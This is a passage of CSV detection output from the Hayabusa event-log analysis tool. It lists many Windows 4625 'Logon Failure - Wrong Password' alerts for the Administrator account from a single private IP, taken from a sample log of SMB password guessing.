NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
